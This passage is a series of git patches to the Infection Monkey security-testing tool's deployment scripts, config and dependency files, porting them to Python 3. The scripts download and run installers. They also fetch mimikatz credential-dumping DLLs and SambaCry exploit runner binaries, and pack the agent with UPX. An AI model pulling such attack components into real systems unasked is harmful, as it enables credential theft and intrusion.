"https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 87d6bc8cf..0403185ff 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -107,6 +107,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP + # Download and install C++ redistributable + "Downloading C++ redistributable ..." + $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) + Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop + Remove-Item $TEMP_CPP_INSTALLER + # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -158,6 +164,19 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue + # Download upx + if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ + "Downloading upx ..." + $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) + "Unzipping upx" + Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue + Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir + # Remove unnecessary files + Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) + "Removing zip file" + Remove-Item $TEMP_UPX_ZIP + } + # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ diff --git a/monkey/infection_monkey/build_windows.bat b/monkey/infection_monkey/build_windows.bat index e2bf2935e..f763bda6b 100644 --- a/monkey/infection_monkey/build_windows.bat +++ b/monkey/infection_monkey/build_windows.bat @@ -1 +1 @@ -pyinstaller -F --log-level=DEBUG --clean --noupx monkey.spec +pyinstaller -F --log-level=DEBUG --clean --upx-dir=.\bin monkey.spec diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index e35fd2630..9c5fa9a18 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -38,6 +38,7 @@ def main(): debug=False, strip=get_exe_strip(), upx=True, + upx_exclude=['vcruntime140.dll'], console=True, icon=get_exe_icon()) From 2d8caddd7b0c0dfa281554c5d89db6515ff250cf Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Mon, 7 Oct 2019 16:24:15 +0300 Subject: [PATCH 06/53] Automatically adds python scripts to path so user could use pyinstaller off the bat --- deployment_scripts/deploy_windows.ps1 | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 0403185ff..5a21c4daa 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -75,12 +75,20 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, } "Installing python packages for island" - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements + $user_python_dir = cmd.exe /c 'py -m site --user-site' + $user_python_dir = Join-Path (Split-Path $user_python_dir) -ChildPath "\Scripts" + if(!($ENV:PATH | Select-String -SimpleMatch $user_python_dir)){ + "Adding python scripts path to user's env" + $env:Path += ";"+$user_python_dir + [Environment]::SetEnvironmentVariable("Path",$env:Path,"User") + } + # Download mongodb if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){ "Downloading mongodb ..." From 7f009da96853be2422f939c53a71732d28580bc1 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 9 Oct 2019 11:23:20 +0300 Subject: [PATCH 07/53] Linux dev. env. deployment altered to support py3 --- deployment_scripts/config | 6 ++ deployment_scripts/deploy_linux.sh | 70 ++++++++++++------- .../infection_monkey/requirements_linux.txt | 4 +- monkey/monkey_island/linux/install_mongo.sh | 3 +- monkey/monkey_island/linux/run.sh | 16 ++++- monkey/monkey_island/requirements.txt | 1 - 6 files changed, 68 insertions(+), 32 deletions(-) diff --git a/deployment_scripts/config b/deployment_scripts/config index bb10ed105..fb7a3d5b6 100644 --- a/deployment_scripts/config +++ b/deployment_scripts/config @@ -14,6 +14,12 @@ WINDOWS_32_BINARY_NAME="monkey-windows-32.exe" WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe" WINDOWS_64_BINARY_NAME="monkey-windows-64.exe" +# Other binaries for monkey +TRACEROUTE_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute64" +TRACEROUTE_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/traceroute32" +SAMBACRY_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner64.so" +SAMBACRY_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/sc_monkey_runner32.so" + # Mongo url's MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz" MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz" diff --git a/deployment_scripts/deploy_linux.sh b/deployment_scripts/deploy_linux.sh index 4df8ba114..136e3f8b1 100644 --- a/deployment_scripts/deploy_linux.sh +++ b/deployment_scripts/deploy_linux.sh @@ -11,9 +11,9 @@ fi ISLAND_PATH="$monkey_home/monkey/monkey_island" MONKEY_COMMON_PATH="$monkey_home/monkey/common/" MONGO_PATH="$ISLAND_PATH/bin/mongodb" -MONGO_BIN_PATH="$MONGO_PATH/bin" -ISLAND_DB_PATH="$ISLAND_PATH/db" ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries" +INFECTION_MONKEY_DIR="$monkey_home/monkey/infection_monkey" +MONKEY_BIN_DIR="$INFECTION_MONKEY_DIR/bin" handle_error () { echo "Fix the errors above and rerun the script" @@ -52,25 +52,39 @@ fi # Create folders log_message "Creating island dirs under $ISLAND_PATH" -mkdir -p ${MONGO_BIN_PATH} -mkdir -p ${ISLAND_DB_PATH} +mkdir -p ${MONGO_PATH} mkdir -p ${ISLAND_BINARIES_PATH} || handle_error -python_version=`python --version 2>&1` -if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then - echo "Python 2.7 is not found or is not a default interpreter for 'python' command..." - exit 1 +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +if [[ ${python_cmd} == "" ]]; then + log_message "Python 3.7 command not found. Installing python 3.7." + sudo add-apt-repository ppa:deadsnakes/ppa + sudo apt install python3.7 + log_message "Python 3.7 is now available with command 'python3.7'." + python_cmd="python3.7" fi log_message "Updating package list" sudo apt-get update log_message "Installing pip" -sudo apt-get install python-pip +sudo apt install python3-pip +${python_cmd} -m pip install pip log_message "Installing island requirements" requirements="$ISLAND_PATH/requirements.txt" -python -m pip install --user -r ${requirements} || handle_error +${python_cmd} -m pip install --user --upgrade -r ${requirements} || handle_error # Download binaries log_message "Downloading binaries" @@ -89,7 +103,7 @@ linux_dist=`lsb_release -a 2> /dev/null` # If a user haven't installed mongo manually check if we can install it with our script log_message "Installing MongoDB" -${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error +${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_PATH} || handle_error log_message "Installing openssl" sudo apt-get install openssl @@ -106,32 +120,38 @@ openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/ser sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error ${ISLAND_PATH}/linux/create_certificate.sh || handle_error +# Update node +log_message "Installing nodejs" +sudo apt-get install -y nodejs + # Install npm log_message "Installing npm" sudo apt-get install npm - -# Update node -log_message "Updating node" -curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash - -sudo apt-get install -y nodejs +npm update log_message "Generating front end" cd "$ISLAND_PATH/cc/ui" || handle_error -npm update npm run dist # Monkey setup log_message "Installing monkey requirements" -sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1 +sudo apt-get install python-dev libffi-dev upx libssl-dev libc++1 cd ${monkey_home}/monkey/infection_monkey || handle_error -python -m pip install --user -r requirements_linux.txt || handle_error +${python_cmd} -m pip install -r requirements_linux.txt --user --upgrade || handle_error + +# Making dir for binaries +mkdir ${MONKEY_BIN_DIR} + +# Download sambacry binaries +log_message "Downloading sambacry binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${SAMBACRY_32_BINARY_URL} + +# Download traceroute binaries +log_message "Downloading tracerout binaries" +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_64_BINARY_URL} +wget -c -N -P ${MONKEY_BIN_DIR} ${TRACEROUTE_32_BINARY_URL} -# Build samba -log_message "Building samba binaries" -sudo apt-get install gcc-multilib -cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner -sudo chmod +x ./build.sh || handle_error -./build.sh sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh diff --git a/monkey/infection_monkey/requirements_linux.txt b/monkey/infection_monkey/requirements_linux.txt index f30131267..9dc66a787 100644 --- a/monkey/infection_monkey/requirements_linux.txt +++ b/monkey/infection_monkey/requirements_linux.txt @@ -1,11 +1,10 @@ -enum34 impacket pycryptodome cffi requests odict paramiko -psutil==3.4.2 +psutil PyInstaller six ecdsa @@ -14,4 +13,3 @@ ipaddress wmi pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/linux/install_mongo.sh b/monkey/monkey_island/linux/install_mongo.sh index 2395454b6..478d7e0ed 100755 --- a/monkey/monkey_island/linux/install_mongo.sh +++ b/monkey/monkey_island/linux/install_mongo.sh @@ -10,7 +10,7 @@ then elif [[ ${os_version_monkey} == "Ubuntu 18.04"* ]] ; then echo Detected Ubuntu 18.04 - export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.0.8.tgz" + export tgz_url="https://fastdl.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1804-4.2.0.tgz" elif [[ ${os_version_monkey} == "Debian GNU/Linux 8"* ]] ; then echo Detected Debian 8 @@ -31,6 +31,7 @@ tar -xf mongodb.tgz popd mkdir -p ${MONGODB_DIR}/bin +mkdir -p ${MONGODB_DIR}/db cp ${TEMP_MONGO}/mongodb-*/bin/mongod ${MONGODB_DIR}/bin/mongod cp ${TEMP_MONGO}/mongodb-*/LICENSE-Community.txt ${MONGODB_DIR}/ chmod a+x ${MONGODB_DIR}/bin/mongod diff --git a/monkey/monkey_island/linux/run.sh b/monkey/monkey_island/linux/run.sh index 978e02fe5..235b30469 100644 --- a/monkey/monkey_island/linux/run.sh +++ b/monkey/monkey_island/linux/run.sh @@ -1,4 +1,16 @@ #!/bin/bash -cd /var/monkey -/var/monkey/monkey_island/bin/python/bin/python monkey_island.py \ No newline at end of file +# Detecting command that calls python 3.7 +python_cmd="" +if [[ `python --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python" +fi +if [[ `python37 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python37" +fi +if [[ `python3.7 --version 2>&1` == *"Python 3.7"* ]]; then + python_cmd="python3.7" +fi + +./bin/mongodb/bin/mongod --dbpath ./bin/mongodb/db +${python_cmd} monkey_island.py \ No newline at end of file diff --git a/monkey/monkey_island/requirements.txt b/monkey/monkey_island/requirements.txt index a2e734324..c887b8527 100644 --- a/monkey/monkey_island/requirements.txt +++ b/monkey/monkey_island/requirements.txt @@ -1,4 +1,3 @@ -bson python-dateutil tornado werkzeug From df7a43127a72d9ccb028f5bd246295540924218d Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 26 Sep 2019 10:53:25 +0300 Subject: [PATCH 08/53] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 5 +---- deployment_scripts/deploy_windows.ps1 | 13 ++++--------- 2 files changed, 5 insertions(+), 13 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 07be64612..4fee48e09 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -3,7 +3,7 @@ $MONKEY_FOLDER_NAME = "infection_monkey" # Url of public git repository that contains monkey's source code $MONKEY_GIT_URL = "https://github.com/guardicore/monkey" # Link to the latest python download or install it manually -$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi" +$PYTHON_URL = "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe" # Monkey binaries $LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32" @@ -33,14 +33,11 @@ $TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" $TEMP_UPX_ZIP = "upx.zip" -$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi" $UPX_FOLDER = "upx394w" # Other url's -$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi" $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" -$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" $PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" $UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 17d08ecc8..1bfb62445 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -44,15 +44,15 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, try { $version = cmd.exe /c '"python" --version 2>&1' - if ( $version -like 'Python 2.7.*' ) { - "Python 2.7.* was found, installing dependancies" + if ( $version -like 'Python 3.*' ) { + "Python 3.* was found, installing dependencies" } else { throw System.Management.Automation.CommandNotFoundException } } catch [System.Management.Automation.CommandNotFoundException] { - "Downloading python 2.7 ..." + "Downloading python 3 ..." $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -69,7 +69,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 2.7 ..." + "Downloading Visual C++ Compiler for Python 3 ..." $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -115,11 +115,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Download and install C++ redistributable - "Downloading C++ redistributable ..." - $webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER) - Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop - Remove-Item $TEMP_CPP_INSTALLER # Generate ssl certificate "Generating ssl certificate" From 1c880a76d9556a0561d45153eeb42d004f645516 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Wed, 2 Oct 2019 10:15:53 +0300 Subject: [PATCH 09/53] Windows deployment scripts to python3 --- deployment_scripts/config.ps1 | 18 ++++++-------- deployment_scripts/deploy_windows.ps1 | 35 ++++++--------------------- monkey/infection_monkey/monkey.spec | 12 +-------- 3 files changed, 15 insertions(+), 50 deletions(-) diff --git a/deployment_scripts/config.ps1 b/deployment_scripts/config.ps1 index 4fee48e09..a3dafc66e 100644 --- a/deployment_scripts/config.ps1 +++ b/deployment_scripts/config.ps1 @@ -22,24 +22,20 @@ $SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so" # Other directories and paths ( most likely you dont need to configure) $MONKEY_ISLAND_DIR = "\monkey\monkey_island" $MONKEY_DIR = "\monkey\infection_monkey" -$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner" +$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin" $PYTHON_DLL = "C:\Windows\System32\python27.dll" -$MK32_DLL = "mk32.dll" -$MK64_DLL = "mk64.dll" -$TEMP_PYTHON_INSTALLER = ".\python.msi" +$MK32_DLL = "mk32.zip" +$MK64_DLL = "mk64.zip" +$TEMP_PYTHON_INSTALLER = ".\python.exe" $TEMP_MONGODB_ZIP = ".\mongodb.zip" $TEMP_OPEN_SSL_ZIP = ".\openssl.zip" -$TEMP_CPP_INSTALLER = "cpp.exe" $TEMP_NPM_INSTALLER = "node.msi" $TEMP_PYWIN32_INSTALLER = "pywin32.exe" -$TEMP_UPX_ZIP = "upx.zip" -$UPX_FOLDER = "upx394w" # Other url's $MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip" $OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip" $NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi" -$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe" -$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip" -$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll" -$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll" +$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b225/pywin32-225.win-amd64-py3.7.exe" +$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip" +$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip" diff --git a/deployment_scripts/deploy_windows.ps1 b/deployment_scripts/deploy_windows.ps1 index 1bfb62445..c7192a4c8 100644 --- a/deployment_scripts/deploy_windows.ps1 +++ b/deployment_scripts/deploy_windows.ps1 @@ -53,6 +53,7 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, catch [System.Management.Automation.CommandNotFoundException] { "Downloading python 3 ..." + "Select 'add to PATH' when installing" $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER) Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") @@ -60,23 +61,12 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, # Check if installed correctly $version = cmd.exe /c '"python" --version 2>&1' if ( $version -like '* is not recognized*' ) { - "Python is not found in PATH. Add it manually or reinstall python." + "Python is not found in PATH. If you just installed python you need to restart cmd. + Else, add it manually or reinstall python." return } } - # Set python home dir - $PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source) - - # Get vcforpython27 before installing requirements - "Downloading Visual C++ Compiler for Python 3 ..." - $webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER) - Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop - $env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine") - Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER - - # Install requirements for island - $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop "Upgrading pip..." $output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1' $output @@ -84,8 +74,11 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Make sure pip module is installed and re-run this script." return } + + "Installing python packages for island" + $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop & python -m pip install --user -r $islandRequirements - # Install requirements for monkey + "Installing python packages for monkey" $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt" & python -m pip install --user -r $monkeyRequirements @@ -115,7 +108,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, "Removing zip file" Remove-Item $TEMP_OPEN_SSL_ZIP - # Generate ssl certificate "Generating ssl certificate" Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR) @@ -167,19 +159,6 @@ function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin") New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue - # Download upx - if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){ - "Downloading upx ..." - $webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP) - "Unzipping upx" - Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue - Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir - # Remove unnecessary files - Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER) - "Removing zip file" - Remove-Item $TEMP_UPX_ZIP - } - # Download mimikatz binaries $mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL if(!(Test-Path -Path $mk32_path )){ diff --git a/monkey/infection_monkey/monkey.spec b/monkey/infection_monkey/monkey.spec index d29adddb1..e35fd2630 100644 --- a/monkey/infection_monkey/monkey.spec +++ b/monkey/infection_monkey/monkey.spec @@ -67,17 +67,11 @@ def process_datas(orig_datas): def get_binaries(): - binaries = get_windows_only_binaries() if is_windows() else get_linux_only_binaries() + binaries = [] if is_windows() else get_linux_only_binaries() binaries += get_sc_binaries() return binaries -def get_windows_only_binaries(): - binaries = [] - binaries += get_msvcr() - return binaries - - def get_linux_only_binaries(): binaries = [] binaries += get_traceroute_binaries() @@ -92,10 +86,6 @@ def get_sc_binaries(): return [(x, get_bin_file_path(x), 'BINARY') for x in ['sc_monkey_runner32.so', 'sc_monkey_runner64.so']] -def get_msvcr(): - return [('msvcr100.dll', os.environ['WINDIR'] + '\\system32\\msvcr100.dll', 'BINARY')] - - def get_traceroute_binaries(): traceroute_name = 'traceroute32' if is_32_bit() else 'traceroute64' return [(traceroute_name, get_bin_file_path(traceroute_name), 'BINARY')] From e7a71e10d8decc92b750fbdd0085e4eded57b850 Mon Sep 17 00:00:00 2001 From: VakarisZ Date: Thu, 3 Oct 2019 12:40:58 +0300 Subject: [PATCH 10/53] Removed enum34 from requirements --- .../infection_monkey/requirements_windows.txt | 2 - monkey/monkey_island/cc/ui/package-lock.json | 101 +++++++++--------- monkey/monkey_island/cc/ui/package.json | 14 +-- 3 files changed, 57 insertions(+), 60 deletions(-) diff --git a/monkey/infection_monkey/requirements_windows.txt b/monkey/infection_monkey/requirements_windows.txt index ce5021923..cb3f43660 100644 --- a/monkey/infection_monkey/requirements_windows.txt +++ b/monkey/infection_monkey/requirements_windows.txt @@ -1,4 +1,3 @@ -enum34 impacket pycryptodome cffi @@ -15,4 +14,3 @@ wmi pywin32 pymssql pyftpdlib -enum34 diff --git a/monkey/monkey_island/cc/ui/package-lock.json b/monkey/monkey_island/cc/ui/package-lock.json index 14e547416..b402cad83 100644 --- a/monkey/monkey_island/cc/ui/package-lock.json +++ b/monkey/monkey_island/cc/ui/package-lock.json @@ -2731,7 +2731,7 @@ "dev": true, "requires": { "bluebird": "3.5.5", - "chownr": "1.1.2", + "chownr": "1.1.3", "figgy-pudding": "3.5.1", "glob": "7.1.4", "graceful-fs": "4.2.2", @@ -2759,7 +2759,7 @@ "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", "dev": true, "requires": { - "yallist": "3.0.3" + "yallist": "3.1.1" } }, "y18n": { @@ -2769,9 +2769,9 @@ "dev": true }, "yallist": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.0.3.tgz", - "integrity": "sha512-S+Zk8DEWE6oKpV+vI3qWkaK+jSbIK86pCwe2IF/xwIpQ8jEuxpw9NyaGjmp9+BoJv5FV2piqCDcoCtStppiq2A==", + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-3.1.1.tgz", + "integrity": "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g==", "dev": true } } @@ -2945,9 +2945,9 @@ } }, "chownr": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.2.tgz", - "integrity": "sha512-GkfeAQh+QNy3wquu9oIZr6SS5x7wGdSgNQvD10X3r+AZr1Oys22HW8kAmDMvNg2+Dm0TeGaEuO8gFwdBXxwO8A==", + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.3.tgz", + "integrity": "sha512-i70fVHhmV3DtTl6nqvZOnIjbY0Pe4kAUjwHj8z0zAdgBtYrJyYwLKCCuRBQ5ppkyL0AkN7HKRnETdmdp1zqNXw==", "dev": true }, "chrome-trace-event": { @@ -5117,9 +5117,9 @@ } }, "eslint-plugin-react": { - "version": "7.14.3", - "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.14.3.tgz", - "integrity": "sha512-EzdyyBWC4Uz2hPYBiEJrKCUi2Fn+BJ9B/pJQcjw5X+x/H2Nm59S4MJIvL4O5NEE0+WbnQwEBxWY03oUk+Bc3FA==", + "version": "7.15.1", + "resolved": "https://registry.npmjs.org/eslint-plugin-react/-/eslint-plugin-react-7.15.1.tgz", + "integrity": "sha512-YotSItgMPwLGlr3df44MGVyXnHkmKcpkHTzpte3QwJtocr3nFqCXCuoxFZeBtnT8RHdj038NlTvam3dcAFrMcA==", "dev": true, "requires": { "array-includes": "3.0.3", @@ -5652,9 +5652,9 @@ "optional": true }, "filepond": { - "version": "4.7.1", - "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.1.tgz", - "integrity": "sha512-AxZBhsGS9QEJfbLiASUJMuS3hLhq/HbkKaJx1gKYCQ0lbs/OfciKKdeFbtAVKk0o9o6DcITw2C+QqFcTP1QBCg==" + "version": "4.7.2", + "resolved": "https://registry.npmjs.org/filepond/-/filepond-4.7.2.tgz", + "integrity": "sha512-OqG35MnmvrGnq2KgHO0PS8uujzRqQL/bMlSy0StqRn6RRAM6wBM9gzQl22IvWLwMyw6g8aIZTZAhMaiTS1LZsA==" }, "fill-range": { "version": "2.2.3", @@ -6362,7 +6362,7 @@ "bundled": true, "dev": true, "requires": { - "inherits": "~2.0.0" + "inherits": "2.0.3" } }, "boom": { @@ -6485,7 +6485,7 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "extend": { @@ -6695,14 +6695,13 @@ "dev": true, "optional": true, "requires": { - "jsbn": "~0.1.0" + "jsbn": "0.1.1" } }, "jsbn": { "version": "0.1.1", "bundled": true, - "dev": true, - "optional": true + "dev": true }, "json-schema": { "version": "0.2.3", @@ -6716,7 +6715,7 @@ "dev": true, "optional": true, "requires": { - "jsonify": "~0.0.0" + "jsonify": "0.0.0" } }, "json-stringify-safe": { @@ -15577,9 +15576,9 @@ } }, "react": { - "version": "16.9.0", - "resolved": "https://registry.npmjs.org/react/-/react-16.9.0.tgz", - "integrity": "sha512-+7LQnFBwkiw+BobzOF6N//BdoNw0ouwmSJTEm9cglOOmsg/TMiFHZLe2sEoN5M7LgJTj9oHH0gxklfnQe66S1w==", + "version": "16.10.1", + "resolved": "https://registry.npmjs.org/react/-/react-16.10.1.tgz", + "integrity": 